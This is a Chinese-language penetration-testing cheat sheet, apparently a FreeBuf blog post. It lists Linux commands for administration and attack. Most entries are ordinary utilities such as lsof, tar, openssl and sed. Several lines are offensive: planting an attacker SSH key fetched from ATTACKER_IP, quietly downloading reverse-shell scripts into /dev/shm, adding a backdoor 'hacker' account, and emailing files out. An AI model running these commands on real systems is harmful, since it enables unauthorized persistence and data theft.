freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

渗透测试Linux命令(奇技淫巧)
灭迹下的荒诞 2025-03-31 11:00:55 6780
所属地 江苏省

渗透测试Linux命令(奇技淫巧)

整理常见渗透、后门维持、数据提取、服务操作等实用命令并附带技巧说明

数据外传 & 编码

# Base64 编码不换行用于数据隐写绕过检测
base64 -w 0 file

# 十六进制输出无换行适合 payload 编码
xxd -p boot12.bin  tr -d '\n'

权限维持 / 后门注入

# 将攻击者公钥加入当前用户 SSH 授权
curl https://ATTACKER_IP/.ssh/id_rsa.pub  ~/.ssh/authorized_keys

Echo 技巧

# 不换行输出同时支持转义字符
echo -n -e '\x41'   # 输出A

文本统计与处理

wc -l file        # 统计行数
wc -c file        # 统计字符数

sort -nr          # 数值降序排序
cat file  sort  uniq   # 排序 + 去重如去重 IP用户等

替换文件内容

sed -i 's/OLD/NEW/g' path/file  # 全局替换字符串

隐蔽下载文件

# 下载文件到内存避免落地留痕
wget http://IP/file.py -O /dev/shm/.rev.py
curl http://IP/shell.py -o /dev/shm/shell.py

网络相关文件分析

lsof -i              # 所有网络文件
lsof -i 4            # IPv4 连接
lsof -i 6            # IPv6 连接
lsof -i :80          # 使用 80 端口的进程
lsof -p 1234         # PID 为 1234 的进程打开的文件
lsof +D /lib         # 使用某目录下文件的进程
fuser -nv tcp 80     # 查找 TCP 80 被谁占用

解压缩各种格式

tar -xvzf file.tgz         # .tgz
tar -xvjf file.tbz         # .tbz
bzip2 -d file.bz2          # .bz2
gunzip file.gz             # .gz
unzip file.zip             # .zip
7z x file.7z               # .7z
unxz file.xz               # .xz (需先安装 xz-utils)

添加用户

useradd -p $(openssl passwd -1 'password') hacker

复制文件内容至剪贴板

xclip -sel c  file.txt

快速搭建 Web 服务器

python -m SimpleHTTPServer 80
python3 -m http.server
php -S 0.0.0.0:80
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port = 80, :DocumentRoot = Dir.pwd).start"

Curl 高级用法

# POST JSON 数据
curl -H "Content-Type: application/json" -X POST \
  -d '{"username":"admin","password":"password"}' http://host:3000/api

# 使用 JWT 认证
curl -X GET -H "Authorization: Bearer JWT" http://host:3000/endpoint

邮件发送数据 exfiltration

sendEmail -t to@email.com -f from@email.com -s 192.168.1.1 \
  -u "Subject" -a file.pdf

文件处理与分析

# 跳过前28字节复制文件
dd if=file.bin bs=28 skip=1 of=out.bin

# 查看压缩包内容
7z l file.zip

挂载虚拟硬盘 (.vhd)

sudo apt-get install libguestfs-tools
guestmount --add file.vhd --inspector --ro /mnt/vhd

OpenSSL 常用操作

# 获取远程 HTTPS 证书
openssl s_client -connect IP:443

# 读取证书信息
openssl x509 -in cert.pem -text

# 生成密钥 + 证书请求
openssl genrsa -out key.pem 2048
openssl req -new -key key.pem -out request.csr

# 自签证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# 由中间证书签名
openssl x509 -req -in request.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out signed.pem

# 导出为 PKCS12
openssl pkcs12 -export -out user.pfx -inkey key.pem -in cert.pem

# 解密 SSH 私钥
openssl rsa -in key.enc -out key.ssh

# 对称解密文件
openssl enc -aes256 -k secret -d -in file.enc -out file

程序执行指令统计

perf stat -x, -e instructions:u "ls"

按日期查找文件用于找后门

find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f \
  -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2/dev/null

系统配置 & 安全防护

# 重设时区
sudo dpkg-reconfigure tzdata

# 查找命令属于哪个包
apt-file search /usr/bin/file   # apt-get install apt-file

# 设置不可删除属性
sudo chattr +i file.txt
sudo chattr -i file.txt

解码 Protobuf 数据

echo "CIKUmMesGw=="  base64 -d  protoc --decode_raw
# 渗透测试 # 网络安全 # 系统安全
本文为 灭迹下的荒诞 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
灭迹下的荒诞 LV.4
这家伙太懒了,还未填写个人描述!
  • 6 文章数
  • 13 关注者
渗透测试macOS命令(温故知新)
2025-03-31
Linux持久化实操
2022-12-12
关于Network Discovery的一些思考
2020-04-21
文章目录